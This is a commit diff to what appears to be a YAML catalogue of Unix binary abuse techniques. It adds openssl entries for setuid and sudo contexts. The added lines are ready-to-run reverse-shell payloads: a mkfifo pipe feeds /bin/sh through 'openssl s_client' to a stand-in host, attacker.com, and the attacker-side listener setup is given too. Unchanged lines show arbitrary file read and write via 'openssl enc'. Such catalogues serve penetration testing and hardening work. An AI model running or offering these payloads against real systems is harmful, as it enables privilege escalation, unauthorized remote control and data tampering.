Add suid/sudo accordingly to openssl

This commit is contained in:
Andrea Cardaci 2019-03-06 14:08:42 +01:00
parent 60af774288
commit 58e517563c

View File

@ -52,11 +52,31 @@ functions:
LFILE=file_to_read LFILE=file_to_read
openssl enc -in "$LFILE" openssl enc -in "$LFILE"
suid: suid:
- description: |
To receive the shell run the following on the attacker box:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
Communication between attacker and target will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo DATA | openssl enc -out "$LFILE" echo DATA | openssl enc -out "$LFILE"
sudo: sudo:
- code: | - description: |
LFILE=file_to_write To receive the shell run the following on the attacker box:
echo DATA | sudo openssl enc -out "$LFILE"
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
Communication between attacker and target will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
--- ---